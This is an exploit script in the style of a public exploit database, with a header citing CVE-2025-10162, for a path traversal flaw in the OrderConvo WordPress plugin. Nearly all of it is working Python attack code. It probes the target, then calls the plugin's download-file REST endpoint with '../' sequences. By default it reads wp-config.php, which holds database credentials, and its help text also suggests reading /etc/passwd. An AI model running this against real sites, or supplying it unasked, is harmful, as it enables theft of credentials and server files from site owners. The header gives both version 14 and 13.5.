# Exploit Title: WordPress OrderConvo 14 - Path Traversal
# Date: 05-31-2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://www.najeebmedia.com/
# Software Link: https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/
# Version: 13.5
# Tested on: Debian
# CVE : CVE-2025-10162
import httpx
import asyncio
import argparse
from urllib.parse import urljoin
import sys
async def main(base_url, file):
async with httpx.AsyncClient(verify=False) as client:
try:
print('[*] Checking connection to target')
req = await client.get(url=base_url)
if req.status_code == 200:
print('[+] The target is alive, exploiting\n')
else:
print(f'[-] Unable to connect to the target. Code: {req.status_code}')
sys.exit()
except:
print(f'[-] Problem with connection to the target.')
sys.exit()
exp_url = urljoin(base_url, f'wp-json/wooconvo/v1/download-file?order_id=1&filename={file}')
r = await client.get(url=exp_url)
if len(r.text) != 0:
print(r.text)
else:
print("[*] Unable to read file")
parser = argparse.ArgumentParser(description="Exploit for CVE-2025-10162")
parser.add_argument("-u", "--url", required=True, help="Target URL, e.g. https://test.local")
parser.add_argument("-f", "--filename", default="../../../../wp-config.php", help="Path to the file to read. Note: You must use deep path traversal sequences (e.g., ../../../../../etc/passwd) to break out of the web root and access sensitive system or WordPress files. (Default: ../../../../wp-config.php)")
args = parser.parse_args()
if __name__ == '__main__':
asyncio.run(main(args.url, args.filename))
